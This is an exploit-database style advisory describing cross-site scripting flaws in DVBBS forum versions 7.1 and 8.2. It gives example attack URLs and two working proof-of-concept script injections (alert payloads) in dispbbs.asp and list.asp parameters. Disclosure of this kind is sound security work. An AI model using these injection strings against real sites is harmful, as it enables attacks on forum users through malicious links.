DVBBS Multiple Cross Site Scripting Vulnerabilities

Posted on 08 March 2010

===================================================
DVBBS Multiple Cross Site Scripting Vulnerabilities
===================================================

Remote:  	 Yes 
Credit:  	 lostmon is credited with the discovery of this vulnerability.
Vulnerable: 	Dvbbs Dvbbs 8.2
Dvbbs Dvbbs 7.1 Sp2
Dvbbs Dvbbs 7.1 

An attacker can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.

Examples have been provided:

http://www.example.com/dispbbs.asp?boardID=8&amp;ID=550194&amp;page=1[XSS-CODE]
http://www.example.com/dispuser.asp?name=Walltrapass[XSS-CODE]
http://www.example.com/boardhelp.asp?boardid=0&amp;act=2&amp;title=[XSS-CODE]
http://www.example.com/boardhelp.asp?boardid=0&amp;view=faq[XSS-CODE]&amp;act=3
http://www.example.com/boardhelp.asp?boardid=0&amp;view=faq&amp;act=3[XSS-CODE]
http://www.example.com/boardhelp.asp?boardid=0&amp;act=2[XSS-CODE]&amp;title= 

http://www.example.com:80/dispbbs.asp?boardid=1&id=1&page="><script>alert(/liscker/);</script>
http://www.example.com:80/forum1/list.asp?boardid=1&id=1&page=><script>alert(/liscker/);</script>


# ~  - [ [ : Inj3ct0r : ] ]

TOP

Malware :

None in database

Last 20

ckdoor:Win32/Heloag.A

Exploit:Win32/CVE-2011-3402

Trojan:Win32/Obfac

Exploit:Win32/Pdfjsc.YP

TrojanDownloader:Win32/Bofang.B

Last 20

Exploits :

Last 20